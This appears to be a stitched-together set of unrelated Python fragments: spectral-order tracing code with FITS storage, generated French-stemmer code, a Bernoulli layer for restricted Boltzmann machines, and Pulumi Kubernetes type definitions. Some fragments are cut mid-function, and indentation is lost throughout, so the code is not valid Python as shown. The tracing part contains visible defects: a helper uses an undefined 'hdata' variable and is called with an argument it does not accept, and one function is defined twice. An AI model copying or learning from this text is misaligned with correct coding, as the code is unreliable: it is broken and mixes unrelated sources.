c_list.append(self._divcmt)
return pf.Header(c_list)
def _trace_to_HDU(self, fit_data):
header = self._header_from_dict(fit_data)
pcolumn = pf.Column(name="params", format='D', unit=None,
array=fit_data['params'])
return pf.BinTableHDU.from_columns([pcolumn,], header=header)
def _trace_from_HDU(self, trace_HDU):
fit_data = {'params':trace_HDU.data['params']}
for dkey,fkey,cmnt in _trace_hkey_spec:
if fkey in trace_HDU.header.keys():
fit_data[dkey] = trace_HDU.header[fkey]
return fit_data
# Make primary header from list of tuples:
def _prihdr_from_dict(self):
prihdr = pf.Header()
prihdr.append(self._divcmt)
prihdr['TRIOVERS'] = (__version__, 'TraceIO code version')
if hdata:
# Standard keys go in first:
for kk in _metadata_order:
if kk in hdata.keys():
prihdr[kk] = tuple(hdata.pop(kk))
prihdr.append(self._divcmt)
# Dump in anything else:
if len(hdata):
prihdr.update({k:tuple(v) for k,v in hdata.items()})
prihdr.append(self._divcmt)
# Save a list of traces to a FITS table:
def store_traces(self, filename, traces_list, hdata=None):
if isinstance(hdata, pf.Header):
prihdr = hdata.copy(strip=True)
else:
prihdr = self._prihdr_from_dict(hdata)
prihdr['TRIOVERS'] = (__version__, 'TraceIO code version')
prihdu = pf.PrimaryHDU(header=prihdr)
tables = [prihdu]
for trace in traces_list:
tables.append(self._trace_to_HDU(trace))
hdu_list = pf.HDUList(tables)
hdu_list.writeto(filename, overwrite=True)
return
# Store from existing TraceData object (e.g., after update):
def store_TraceData(self, filename, tdobj):
tdata = tdobj.get_trace_list()
mdata = tdobj.get_metadata()
return self.store_traces(filename, tdata, hdata=mdata)
# Load traces from the specified file:
def load_traces(self, filename):
traces_list = []
with pf.open(filename) as hdu_list:
all_pri_keys = hdu_list[0].header
use_pri_keys = all_pri_keys.copy(strip=True)
for hdu in hdu_list[1:]:
traces_list.append(self._trace_from_HDU(hdu))
return TraceData(traces_list, use_pri_keys)
##--------------------------------------------------------------------------##
## overplotting of traces onto image ##
##--------------------------------------------------------------------------##
## Trimmer for 'drawing' ridges:
#def trim_to_image_dims(xcoo, ycoo, imshape):
def trim_to_image_dims(xcoo, ycoo, image):
ny, nx = image.shape
useful = (0 <= xcoo) & (xcoo < nx) & (0 <= ycoo) & (ycoo < ny)
return (ycoo[useful], xcoo[useful])
def overplot_traces(idata, trace_list, vlevel=0):
n_traces = len(trace_list)
tmp_image = np.copy(idata)
for i,trace_fit in enumerate(trace_list, 1):
if (vlevel >= 0):
sys.stderr.write("\rPainting trace %d of %d ... " % (i, n_traces))
#ordfit_params = nrex.fit_polynomial(xlist, ylist, fit_degree)['params']
xlist = np.arange(trace_fit['xmin'], trace_fit['xmax']).astype('uint16')
ordfit_ycoord = ridge_eval(trace_fit['params'], xlist)
ylower = np.int_(np.floor(ordfit_ycoord))
#ylower_safe = trim_to_image_dims(xlist, ylower + 0, tmp_image)
#yupper_safe = trim_to_image_dims(xlist, ylower + 1, tmp_image)
tmp_image[trim_to_image_dims(xlist, ylower + 0, tmp_image)] = np.nan
tmp_image[trim_to_image_dims(xlist, ylower + 1, tmp_image)] = np.nan
sys.stderr.write("done.\n")
return tmp_image
#def get_trace_xya(trace_fit):
# """
# Return X position, ridge Y position, and pixel apron from the specified
# trace parameter dictionary.
#
# NOTE: positions are in array coordinates (0-indexed)
# """
# ridge_x = np.arange(trace_fit['xmin'], trace_fit['xmax']).astype('uint16')
# ridge_y = ridge_eval(trace_fit['params'], ridge_x)
# return (ridge_x, ridge_y, trace_fit['apron'])
#def mask_from_traces(imshape, trace_list, vlevel=0):
# mask_image = np.zeros(imshape, dtype='bool')
# trace_coords = []
# n_traces = len(trace_list)
# for i,trace_fit in enumerate(trace_list, 1):
# if (vlevel >= 1):
# sys.stderr.write("\rAdding trace %d of %d ... " % (i, n_traces))
# xlist = np.arange(trace_fit['xmin'], trace_fit['xmax']).astype('uint16')
# ordfit_ycoord = ridge_eval(trace_fit['params'], xlist)
# ylower = np.int_(np.floor(ordfit_ycoord))
# yc_list, xc_list = [], []
# apron_pix = trace_fit['apron']
# for offset in range(-apron_pix + 1, apron_pix + 1):
# xc_list.append(xlist)
# yc_list.append(ylower + offset)
# pass
# trace_coords.append((np.vstack(yc_list), np.vstack(xc_list)))
# return trace_coords
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
##--------------------------------------------------------------------------##
## Ridge fitting and evaluation:
def fit_polynomial(xvec, yvec, poly=2, rlm=True):
results = {'xmin':xvec.min(), 'xmax':xvec.max()}
design_matrix = np.column_stack([xvec**i for i in range(poly + 1)])
if rlm:
best_fit = sm.RLM(yvec, design_matrix).fit()
else:
best_fit = sm.OLS(yvec, design_matrix).fit()
results['params'] = best_fit.params
results['fitting'] = best_fit
return results
def theil_sen_fit(xvec, yvec, poly=1, rlm=False):
results = {'xmin':xvec.min(), 'xmax':xvec.max()}
results['params'] = ts.linefit(xvec, yvec, weighted=False, joint=True)
results['fitting'] = None
return results
def fit_yridge(spectrum_order, poly=2, rlm=True):
xcoo, ycoo, flux = spectrum_order
return fit_polynomial(xcoo, ycoo, poly=poly, rlm=rlm)
## Evaluate a polynomial ridge fit:
def ridge_eval(model, xpos):
return np.sum([cc*np.float_(xpos)**i for i,cc in enumerate(model)], axis=0)
## Return ridge x,y array coordinates:
def ridge_pos_2d(rspec):
xcoords = np.arange(rspec['xmin'], rspec['xmax'] + 1, dtype='float32')
ycoords = ridge_eval(rspec['params'], xcoords)
return xcoords, ycoords
## Fit polynomials to all orders in a spectrum:
def fit_spectrum_ridges_fluxes(spectrum_orders, ypoly=2, fpoly=2, vlevel=0):
ridges = []
fluxes = []
n_orders = len(spectrum_orders)
for i, (xcoo, ycoo, flux) in enumerate(spectrum_orders):
if vlevel >= 1:
sys.stderr.write("\rFitting order %d of %d ... " % (i+1, n_orders))
ridges.append(fit_polynomial(xcoo, ycoo, poly=ypoly))
fluxes.append(fit_polynomial(xcoo, flux, poly=fpoly))
if vlevel >= 1:
sys.stderr.write("done.\n")
return (ridges, fluxes)
## Evaluate all orders:
def splat_orders_onto_image(image, ridge_list, fluxes_list, dtype='float32'):
orderpos = np.zeros_like(image, dtype=dtype)
for rr,ff in zip(ridge_list, fluxes_list):
xvalues, yvalues = ridge_pos_2d(rr)
xvalues, fvalues = ridge_pos_2d(ff)
xcoords = np.int_(xvalues)
y_upper = np.int_(np.ceil(yvalues))
y_lower = np.int_(np.floor(yvalues))
orderpos[y_upper+1, xcoords] = fvalues
orderpos[y_upper+0, xcoords] = fvalues
orderpos[y_lower-0, xcoords] = fvalues
orderpos[y_lower-1, xcoords] = fvalues
return orderpos
def splat_orders_onto_image(image, ridge_list, fluxes_list, dtype='float32'):
orderpos = np.zeros_like(image, dtype=dtype)
for rr,ff in zip(ridge_list, fluxes_list):
xvalues, yvalues = ridge_pos_2d(rr)
xvalues, fvalues = ridge_pos_2d(ff)
xcoords = np.int_(xvalues)
y_upper = np.int_(np.ceil(yvalues))
y_lower = np.int_(np.floor(yvalues))
orderpos[y_upper+1, xcoords] = fvalues
orderpos[y_upper+0, xcoords] = fvalues
orderpos[y_lower-0, xcoords] = fvalues
orderpos[y_lower-1, xcoords] = fvalues
return orderpos
##--------------------------------------------------------------------------##
## Ridge object for tracing echelle orders:
class Ridge(object):
def __init__(self, image, bmask=None):
"""
Initialize ridge detector. Inputs:
image -- 2D image with spectrum to trace
bounds -- [optional] where to stop extracting (e.g., baffle mask)
"""
self.idata = image
self.bmask = bmask
pass
# ---------------------------------------------
# Follow-the-ridge driver routine:
def extract(self, yapprox, xcolumns, apron, nshift=40,
mincounts=None, maxdepth=0, vlevel=0):
"""
Main extraction driver routine. Spreads outwards from initial
guess, following flux 'ridge' until the signal is lost or an edge
is reached. Returns X,Y (0-indexed) coordinates of identified ridge.
yapprox -- approximate Y-coord of ridge (array coords)
xcolumns -- slice with column range for initial guess/fit
apron -- half-size of re-centroiding box (pixels)
maxdepth -- [debugging] limit the number of extension iterations
vlevel -- verbosity control
"""
# MAXDEPTH warning:
if maxdepth > 0:
sys.stderr.write("WARNING: maxdepth in use: %d\n" % maxdepth)
# Get data, perform initial linear fit:
ysection = self._make_yslice(yapprox, apron)
r1x, r1y = self._guess_ridge_from_slices(self.idata, xcolumns, ysection)
#initial_fit = nrex.fit_polynomial(r1x, r1y, poly=1)
initial_fit = fit_polynomial(r1x, r1y, poly=1)
#sys.stderr.write("r1x: %s\n" % str(r1x))
#sys.stderr.write("r1y: %s\n" % str(r1y))
#sys.stderr.write("initial_fit: %s\n" % str(initial_fit))
## DEBUGGING: evaluate initial_fit for inspection:
#sys.stderr.write("-------------------------------------------\n")
#dbg_fitted_y = ridge_eval(initial_fit['params'], r1x)
#sys.stderr.write("initial_fit_debug:\n")
#sys.stderr.write("%s\n" % str(np.vstack((r1x, dbg_fitted_y)).T))
#sys.stderr.write("-------------------------------------------\n")
# Refine ridge position using symmetric apron, refit:
r2x, r2y, r2counts = self._recenter_ridge_ixmodel(self.idata,
r1x, initial_fit['params'], apron)
#starter_fit = nrex.fit_polynomial(r2x, r2y, poly=1)
starter_fit = fit_polynomial(r2x, r2y, poly=1)
#sys.stderr.write("starter_fit: %s\n" % str(starter_fit))
#sys.stderr.write("r2x: %s\n" % str(r2x))
#sys.stderr.write("r2y: %s\n" % str(r2y))
##asdf = raw_input()
## DEBUGGING: evaluate starter_fit for inspection:
#sys.stderr.write("-------------------------------------------\n")
#dbg_fitted_y = ridge_eval(starter_fit['params'], r1x)
#sys.stderr.write("starter_fit_debug:\n")
#sys.stderr.write("%s\n" % str(np.vstack((r1x, dbg_fitted_y)).T))
#sys.stderr.write("-------------------------------------------\n")
##return (r2x, dbg_fitted_y)
# Extend initial fit in both directions:
extkw = {'apron':apron, 'mincounts':mincounts,
'maxdepth':maxdepth, 'vlevel':vlevel}
rsegs = self._extend_ridge_to_edge(self.idata, starter_fit,
nudgepix=nshift, **extkw)
lsegs = self._extend_ridge_to_edge(self.idata, starter_fit,
nudgepix=-nshift, **extkw)
# Combine segments:
segments = [(r2x, r2y)]
segments.extend(rsegs)
segments.extend(lsegs)
# Separate coordinates, return sorted results:
xlist, ylist = zip(*segments)
xlist, ylist = np.hstack(xlist), np.hstack(ylist)
order = np.argsort(xlist)
return xlist[order], ylist[order]
# ---------------------------------------------
@staticmethod
def _make_yslice(ycenter, apron):
"""Make slice centered | |
not self.slice_from(u"eux"):
return False
except lab14: pass
elif among_var == 12:
# (, line 150
# call R1, line 150
if not self.r_R1():
return False
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
# delete, line 150
if not self.slice_del():
return False
elif among_var == 13:
# (, line 155
# call RV, line 155
if not self.r_RV():
return False
# fail, line 155
# (, line 155
# <-, line 155
if not self.slice_from(u"ant"):
return False
return False
elif among_var == 14:
# (, line 156
# call RV, line 156
if not self.r_RV():
return False
# fail, line 156
# (, line 156
# <-, line 156
if not self.slice_from(u"ent"):
return False
return False
elif among_var == 15:
# (, line 158
# test, line 158
v_11 = self.limit - self.cursor
# (, line 158
if not self.in_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
# call RV, line 158
if not self.r_RV():
return False
self.cursor = self.limit - v_11
# fail, line 158
# (, line 158
# delete, line 158
if not self.slice_del():
return False
return False
return True
def r_i_verb_suffix(self):
# setlimit, line 163
v_1 = self.limit - self.cursor
# tomark, line 163
if self.cursor < self.I_pV:
return False
self.cursor = self.I_pV
v_2 = self.limit_backward
self.limit_backward = self.cursor
self.cursor = self.limit - v_1
# (, line 163
# [, line 164
self.ket = self.cursor
# substring, line 164
among_var = self.find_among_b(FrenchStemmer.a_5, 35)
if among_var == 0:
self.limit_backward = v_2
return False
# ], line 164
self.bra = self.cursor
if among_var == 0:
self.limit_backward = v_2
return False
elif among_var == 1:
# (, line 170
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
self.limit_backward = v_2
return False
# delete, line 170
if not self.slice_del():
return False
self.limit_backward = v_2
return True
def r_verb_suffix(self):
# setlimit, line 174
v_1 = self.limit - self.cursor
# tomark, line 174
if self.cursor < self.I_pV:
return False
self.cursor = self.I_pV
v_2 = self.limit_backward
self.limit_backward = self.cursor
self.cursor = self.limit - v_1
# (, line 174
# [, line 175
self.ket = self.cursor
# substring, line 175
among_var = self.find_among_b(FrenchStemmer.a_6, 38)
if among_var == 0:
self.limit_backward = v_2
return False
# ], line 175
self.bra = self.cursor
if among_var == 0:
self.limit_backward = v_2
return False
elif among_var == 1:
# (, line 177
# call R2, line 177
if not self.r_R2():
self.limit_backward = v_2
return False
# delete, line 177
if not self.slice_del():
return False
elif among_var == 2:
# (, line 185
# delete, line 185
if not self.slice_del():
return False
elif among_var == 3:
# (, line 190
# delete, line 190
if not self.slice_del():
return False
# try, line 191
v_3 = self.limit - self.cursor
try:
# (, line 191
# [, line 191
self.ket = self.cursor
# literal, line 191
if not self.eq_s_b(1, u"e"):
self.cursor = self.limit - v_3
raise lab0()
# ], line 191
self.bra = self.cursor
# delete, line 191
if not self.slice_del():
return False
except lab0: pass
self.limit_backward = v_2
return True
def r_residual_suffix(self):
# (, line 198
# try, line 199
v_1 = self.limit - self.cursor
try:
# (, line 199
# [, line 199
self.ket = self.cursor
# literal, line 199
if not self.eq_s_b(1, u"s"):
self.cursor = self.limit - v_1
raise lab0()
# ], line 199
self.bra = self.cursor
# test, line 199
v_2 = self.limit - self.cursor
if not self.out_grouping_b(FrenchStemmer.g_keep_with_s, 97, 232):
self.cursor = self.limit - v_1
raise lab0()
self.cursor = self.limit - v_2
# delete, line 199
if not self.slice_del():
return False
except lab0: pass
# setlimit, line 200
v_3 = self.limit - self.cursor
# tomark, line 200
if self.cursor < self.I_pV:
return False
self.cursor = self.I_pV
v_4 = self.limit_backward
self.limit_backward = self.cursor
self.cursor = self.limit - v_3
# (, line 200
# [, line 201
self.ket = self.cursor
# substring, line 201
among_var = self.find_among_b(FrenchStemmer.a_7, 7)
if among_var == 0:
self.limit_backward = v_4
return False
# ], line 201
self.bra = self.cursor
if among_var == 0:
self.limit_backward = v_4
return False
elif among_var == 1:
# (, line 202
# call R2, line 202
if not self.r_R2():
self.limit_backward = v_4
return False
# or, line 202
try:
v_5 = self.limit - self.cursor
try:
# literal, line 202
if not self.eq_s_b(1, u"s"):
raise lab2()
raise lab1()
except lab2: pass
self.cursor = self.limit - v_5
# literal, line 202
if not self.eq_s_b(1, u"t"):
self.limit_backward = v_4
return False
except lab1: pass
# delete, line 202
if not self.slice_del():
return False
elif among_var == 2:
# (, line 204
# <-, line 204
if not self.slice_from(u"i"):
return False
elif among_var == 3:
# (, line 205
# delete, line 205
if not self.slice_del():
return False
elif among_var == 4:
# (, line 206
# literal, line 206
if not self.eq_s_b(2, u"gu"):
self.limit_backward = v_4
return False
# delete, line 206
if not self.slice_del():
return False
self.limit_backward = v_4
return True
def r_un_double(self):
# (, line 211
# test, line 212
v_1 = self.limit - self.cursor
# among, line 212
if self.find_among_b(FrenchStemmer.a_8, 5) == 0:
return False
self.cursor = self.limit - v_1
# [, line 212
self.ket = self.cursor
# next, line 212
if self.cursor <= self.limit_backward:
return False
self.cursor -= 1
# ], line 212
self.bra = self.cursor
# delete, line 212
if not self.slice_del():
return False
return True
def r_un_accent(self):
# (, line 215
# atleast, line 216
v_1 = 1
# atleast, line 216
try:
while True:
try:
try:
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
raise lab2()
v_1 -= 1
raise lab1()
except lab2: pass
raise lab0()
except lab1: pass
except lab0: pass
if v_1 > 0:
return False
# [, line 217
self.ket = self.cursor
# or, line 217
try:
v_3 = self.limit - self.cursor
try:
# literal, line 217
if not self.eq_s_b(1, u"\u00E9"):
raise lab4()
raise lab3()
except lab4: pass
self.cursor = self.limit - v_3
# literal, line 217
if not self.eq_s_b(1, u"\u00E8"):
return False
except lab3: pass
# ], line 217
self.bra = self.cursor
# <-, line 217
if not self.slice_from(u"e"):
return False
return True
def _stem(self):
# (, line 221
# do, line 223
v_1 = self.cursor
try:
# call prelude, line 223
if not self.r_prelude():
raise lab0()
except lab0: pass
self.cursor = v_1
# do, line 224
v_2 = self.cursor
try:
# call mark_regions, line 224
if not self.r_mark_regions():
raise lab1()
except lab1: pass
self.cursor = v_2
# backwards, line 225
self.limit_backward = self.cursor
self.cursor = self.limit
# (, line 225
# do, line 227
v_3 = self.limit - self.cursor
try:
# (, line 227
# or, line 237
try:
v_4 = self.limit - self.cursor
try:
# (, line 228
# and, line 233
v_5 = self.limit - self.cursor
# (, line 229
# or, line 229
try:
v_6 = self.limit - self.cursor
try:
# call standard_suffix, line 229
if not self.r_standard_suffix():
raise lab6()
raise lab5()
except lab6: pass
self.cursor = self.limit - v_6
try:
# call i_verb_suffix, line 230
if not self.r_i_verb_suffix():
raise lab7()
raise lab5()
except lab7: pass
self.cursor = self.limit - v_6
# call verb_suffix, line 231
if not self.r_verb_suffix():
raise lab4()
except lab5: pass
self.cursor = self.limit - v_5
# try, line 234
v_7 = self.limit - self.cursor
try:
# (, line 234
# [, line 234
self.ket = self.cursor
# or, line 234
try:
v_8 = self.limit - self.cursor
try:
# (, line 234
# literal, line 234
if not self.eq_s_b(1, u"Y"):
raise lab10()
# ], line 234
self.bra = self.cursor
# <-, line 234
if not self.slice_from(u"i"):
return False
raise lab9()
except lab10: pass
self.cursor = self.limit - v_8
# (, line 235
# literal, line 235
if not self.eq_s_b(1, u"\u00E7"):
self.cursor = self.limit - v_7
raise lab8()
# ], line 235
self.bra = self.cursor
# <-, line 235
if not self.slice_from(u"c"):
return False
except | |
<gh_stars>100-1000
from collections import namedtuple
from .. import backends as be
from .layer import Layer, CumulantsTAP
ParamsBernoulli = namedtuple("ParamsBernoulli", ["loc"])
class BernoulliLayer(Layer):
"""
Layer with Bernoulli units (i.e., 0 or +1).
"""
def __init__(self, num_units, center=False):
"""
Create a layer with Bernoulli units.
Args:
num_units (int): the size of the layer
center (bool): whether to center the layer
Returns:
Bernoulli layer
"""
super().__init__(num_units, center)
self.rand = be.rand
self.params = ParamsBernoulli(be.zeros(self.len))
#
# Methods for the TAP approximation
#
def get_magnetization(self, mean):
"""
Compute a CumulantsTAP object for the BernoulliLayer.
Args:
mean (tensor (num_units,)): expected values of the units
returns:
CumulantsTAP
"""
return CumulantsTAP(mean, mean - be.square(mean))
def get_zero_magnetization(self):
"""
Create a layer magnetization with zero expectations.
Args:
None
Returns:
CumulantsTAP
"""
return self.get_magnetization(be.zeros_like(self.params[0]))
def get_random_magnetization(self, num_samples=1, epsilon=be.float_scalar(1e-6)):
"""
Create a layer magnetization with random expectations.
Args:
num_samples (int>0): number of random samples to draw
epsilon (float): bound away from [0,1] in which to draw magnetization values
Returns:
CumulantsTAP
"""
# If num_samples == 1 we do not vectorize computations over a sampling set
# for the sake of performance
if num_samples > 1:
return self.get_magnetization(be.clip(be.rand((num_samples,self.len,)),
a_min=epsilon, a_max=be.float_scalar(1-epsilon)))
return self.get_magnetization(be.clip(be.rand((self.len,)),
a_min=epsilon, a_max=be.float_scalar(1-epsilon)))
def clip_magnetization(self, magnetization, a_min=be.float_scalar(1e-6),
a_max=be.float_scalar(1 - 1e-6)):
"""
Clip the mean of the mean of a CumulantsTAP object.
Args:
magnetization (CumulantsTAP) to clip
a_min (float): the minimum value
a_max (float): the maximum value
Returns:
clipped magnetization (CumulantsTAP)
"""
tmp = be.clip(magnetization.mean, a_min=a_min, a_max=a_max)
return self.get_magnetization(tmp)
def clip_magnetization_(self, magnetization, a_min=be.float_scalar(1e-6),
a_max=be.float_scalar(1 - 1e-6)):
"""
Clip the mean of the mean of a CumulantsTAP object.
Args:
magnetization (CumulantsTAP) to clip
a_min (float): the minimum value
a_max (float): the maximum value
Returns:
None
"""
be.clip_(magnetization.mean[:], a_min=a_min, a_max=a_max)
magnetization.variance[:] = magnetization.mean - be.square(magnetization.mean)
def log_partition_function(self, external_field, quadratic_field):
"""
Compute the logarithm of the partition function of the layer
with external field (B) and quadratic field (A).
Let a_i be the loc parameter of unit i.
Let B_i be an external field
Let A_i be a quadratic field
Z_i = Tr_{x_i} exp( a_i x_i + B_i x_i + A_i x_i^2)
= 1 + \exp(a_i + B_i + A_i)
log(Z_i) = softplus(a_i + B_i + A_i)
Args:
external_field (tensor (num_samples, num_units)): external field
quadratic_field (tensor (num_samples, num_units)): quadratic field
Returns:
logZ (tensor (num_samples, num_units)): log partition function
"""
return be.softplus(self.params.loc + quadratic_field + external_field)
def lagrange_multipliers_analytic(self, cumulants):
"""
Return the Lagrange multipliers (at beta=0) according to the starionarity
conditions {d/da(GibbsFE)=0, d/dc(GibbsFE)=0} at beta=0.
Args:
cumulants (CumulantsTAP object): layer magnetization cumulants
Returns:
lagrange multipliers (CumulantsTAP)
"""
mean = be.subtract(self.params.loc, be.logit(cumulants.mean))
variance = be.zeros_like(cumulants.variance)
return CumulantsTAP(mean, variance)
def update_lagrange_multipliers_(self, cumulants, lagrange_multipliers,
connected_cumulants,
rescaled_connected_weights,
rescaled_connected_weights_sq):
"""
Update, in-place, the Lagrange multipliers with respect to the TAP2 approximation
of the GFE as in
<NAME>, <NAME>, <NAME>, <NAME>,
and <NAME>
"A Deterministic and Generalized Framework for Unsupervised Learning
with Restricted Boltzmann Machines"
Args:
cumulants (CumulantsTAP): layer magnetization cumulants
lagrange_multipliers (CumulantsTAP)
connected_cumulants (CumulantsTAP): connected magnetization cumulants
rescaled_connected_weights (list[tensor, (num_connected_units, num_units)]):
The weights connecting the layers.
rescaled_connected_weights_sq (list[tensor, (num_connected_units, num_units)]):
The cached squares of weights connecting the layers.
(unused on Bernoulli layer)
Returns:
None
"""
lagrange_multipliers.variance[:] = be.zeros_like(lagrange_multipliers.variance)
lagrange_multipliers.mean[:] = be.zeros_like(lagrange_multipliers.mean)
for l in range(len(connected_cumulants)):
# let len(mean) = N and len(connected_mag[l].mean) = N_l
# weights[l] is a matrix of shape (N_l, N)
w_l = rescaled_connected_weights[l]
w2_l = rescaled_connected_weights_sq[l]
lagrange_multipliers.mean[:] += \
be.dot(connected_cumulants[l].mean, w_l) + \
be.multiply(be.dot(connected_cumulants[l].variance, w2_l),
0.5 - cumulants.mean)
def TAP_entropy(self, cumulants):
"""
The TAP-0 Gibbs free energy term associated strictly with this layer
Args:
cumulants (CumulantsTAP): magnetization of the layer
Returns:
(float): 0th order term of Gibbs free energy
"""
# this quadratic approximation is 2x faster:
#a = be.float_scalar(1.06*2.77258872224)
#u = be.float_scalar(1.06*-0.69314718056)
#return be.tsum(be.add(u, a * be.square(be.subtract(0.5, cumulants.mean)))) - \
# be.dot(self.params.loc, cumulants.mean)
alias = 1.0-cumulants.mean
return be.dot(cumulants.mean, be.log(cumulants.mean)) + \
be.dot(alias, be.log(alias)) - \
be.dot(self.params.loc, cumulants.mean)
def TAP_magnetization_grad(self, cumulants,
connected_cumulants, rescaled_connected_weights,
rescaled_connected_weights_sq):
"""
Gradient of the Gibbs free energy with respect to the magnetization
associated strictly with this layer.
Args:
cumulants (CumulantsTAP): magnetization of the layer
connected_cumulants (list[CumulantsTAP]): magnetizations of the connected layers
rescaled_connected_weights (list[tensor, (num_connected_units, num_units)]):
The weights connecting the layers.
rescaled_connected_weights_sq (list[tensor, (num_connected_units, num_units)]):
The cached squares of weights connecting the layers.
Return:
gradient of GFE w.r.t. magnetization (CumulantsTAP)
"""
mean = be.logit(cumulants.mean) - self.params.loc
variance = be.zeros_like(mean)
for l in range(len(connected_cumulants)):
# let len(mean) = N and len(connected_cumulants[l].mean) = N_l
# weights[l] is a matrix of shape (N_l, N)
w_l = rescaled_connected_weights[l]
w2_l = rescaled_connected_weights_sq[l]
mean -= be.dot(connected_cumulants[l].mean, w_l) + \
be.multiply(be.dot(connected_cumulants[l].variance, w2_l),
0.5 - cumulants.mean)
return CumulantsTAP(mean, variance)
def self_consistent_update_(self, cumulants, lagrange_multipliers):
"""
Applies self-consistent TAP update to the layer's magnetization. This formula
is analytically computed --not based on a 2-term truncation of the Gibbs FE.
Args:
cumulants (CumulantsTAP object): magnetization of the layer
lagrange_multipliers (CumulantsTAP object)
Returns:
None
"""
cumulants.mean[:] = be.expit(self.params.loc + lagrange_multipliers.mean)
cumulants.variance[:] = cumulants.mean - be.square(cumulants.mean)
def GFE_derivatives(self, cumulants, connected_cumulants=None,
rescaled_connected_weights=None,
rescaled_connected_weights_sq=None):
"""
Gradient of the Gibbs free energy with respect to local field parameters
Args:
cumulants (CumulantsTAP object): magnetization of the layer
Returns:
gradient parameters (ParamsBernoulli): gradient w.r.t. local fields of GFE
"""
return [ParamsBernoulli(-cumulants.mean)]
#
# Methods for sampling and sample-based training
#
def energy(self, units):
"""
Compute the energy of the Bernoulli layer.
For sample k,
E_k = -\sum_i loc_i * v_i
Args:
units (tensor (num_samples, num_units)): values of units
Returns:
tensor (num_samples,): energy per sample
"""
return -be.dot(units, self.params.loc)
def online_param_update(self, units):
"""
Update the parameters using an observed batch of data.
Used for initializing the layer parameters.
Notes:
Modifies layer.params in place.
Args:
units (tensor (num_samples, num_units)): observed values for units
Returns:
None
"""
self.moments.update(units, axis=0)
self.set_params([ParamsBernoulli(be.logit(self.moments.mean))])
def shrink_parameters(self, shrinkage=1):
"""
Apply shrinkage to the parameters of the layer.
Does nothing for the Bernoulli layer.
Args:
shrinkage (float \in [0,1]): the amount of shrinkage to apply
Returns:
None
"""
pass
def rescale(self, observations):
"""
Rescale is trivial for the Bernoulli layer.
Args:
observations (tensor (num_samples, num_units)):
Values of the observed units.
Returns:
tensor: observations
"""
if not self.center:
return observations
return be.subtract(self.get_center(), observations)
def rescale_cumulants(self, cumulants):
"""
Rescales the cumulants associated with the layer.
Trivial for the Bernoulli layer.
Args:
cumulants (CumulantsTAP)
Returns:
rescaled cumulants (CumulantsTAP)
"""
return cumulants
def reciprocal_scale(self):
"""
Returns a tensor of shape (num_units) providing a reciprocal scale for each unit
Args:
None
Returns:
reciproical scale (tensor)
"""
return be.ones_like(self.params[0])
def derivatives(self, units, connected_units, connected_weights,
penalize=True, weighting_function=be.do_nothing):
"""
Compute the derivatives of the layer parameters.
Args:
units (tensor (num_samples, num_units)):
The values of the layer units.
connected_units list[tensor (num_samples, num_connected_units)]:
The rescaled values of the connected units.
connected_weights list[tensor, (num_connected_units, num_units)]:
The weights connecting the layers.
penalize (bool): whether to add a penalty term.
weighting_function (function): a weighting function to apply
to units when computing the gradient.
Returns:
grad (namedtuple): param_name: tensor (contains gradient)
"""
loc = -be.mean(weighting_function(units), axis=0)
if penalize:
loc = self.get_penalty_grad(loc, 'loc')
return [ParamsBernoulli(loc)]
def zero_derivatives(self):
"""
Return an object like the derivatives that is filled with zeros.
Args:
None
Returns:
derivs (List[namedtuple]): List[param_name: tensor] (contains gradient)
"""
return [be.apply(be.zeros_like, self.params)]
def random_derivatives(self):
"""
Return an object like the derivatives that is filled with random floats.
Args:
None
Returns:
derivs (List[namedtuple]): List[param_name: tensor] (contains gradient)
"""
return [be.apply(be.rand_like, self.params)]
def conditional_params(self, scaled_units, weights, beta=None):
"""
Compute the parameters of the layer conditioned on the state
of the connected layers.
Args:
scaled_units list[tensor (num_samples, num_connected_units)]:
The rescaled values of the connected units.
weights list[tensor, (num_connected_units, num_units)]:
The weights connecting the layers.
beta (tensor (num_samples, 1), optional):
Inverse temperatures.
Returns:
tensor: conditional parameters
"""
assert(len(scaled_units) == len(weights))
field = be.dot(scaled_units[0], weights[0])
for i in range(1, len(weights)):
field += be.dot(scaled_units[i], weights[i])
field += self.params.loc
if beta is not None:
field = be.multiply(beta, field)
return field
def conditional_mode(self, scaled_units, weights, beta=None):
"""
Compute the mode of the distribution conditioned on the state
of the connected layers.
Args:
scaled_units list[tensor (num_samples, num_connected_units)]:
The rescaled values of the | |
"gmsa_credential_spec")
@property
@pulumi.getter(name="gmsaCredentialSpecName")
def gmsa_credential_spec_name(self) -> Optional[str]:
"""
GMSACredentialSpecName is the name of the GMSA credential spec to use.
"""
return pulumi.get(self, "gmsa_credential_spec_name")
@property
@pulumi.getter(name="runAsUserName")
def run_as_user_name(self) -> Optional[str]:
"""
The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "run_as_user_name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecTolerations(dict):
"""
The pod this Toleration is attached to tolerates any taint that matches the triple <key,value,effect> using the matching operator <operator>.
"""
def __init__(__self__, *,
effect: Optional[str] = None,
key: Optional[str] = None,
operator: Optional[str] = None,
toleration_seconds: Optional[int] = None,
value: Optional[str] = None):
"""
The pod this Toleration is attached to tolerates any taint that matches the triple <key,value,effect> using the matching operator <operator>.
:param str effect: Effect indicates the taint effect to match. Empty means match all taint effects. When specified, allowed values are NoSchedule, PreferNoSchedule and NoExecute.
:param str key: Key is the taint key that the toleration applies to. Empty means match all taint keys. If the key is empty, operator must be Exists; this combination means to match all values and all keys.
:param str operator: Operator represents a key's relationship to the value. Valid operators are Exists and Equal. Defaults to Equal. Exists is equivalent to wildcard for value, so that a pod can tolerate all taints of a particular category.
:param int toleration_seconds: TolerationSeconds represents the period of time the toleration (which must be of effect NoExecute, otherwise this field is ignored) tolerates the taint. By default, it is not set, which means tolerate the taint forever (do not evict). Zero and negative values will be treated as 0 (evict immediately) by the system.
:param str value: Value is the taint value the toleration matches to. If the operator is Exists, the value should be empty, otherwise just a regular string.
"""
if effect is not None:
pulumi.set(__self__, "effect", effect)
if key is not None:
pulumi.set(__self__, "key", key)
if operator is not None:
pulumi.set(__self__, "operator", operator)
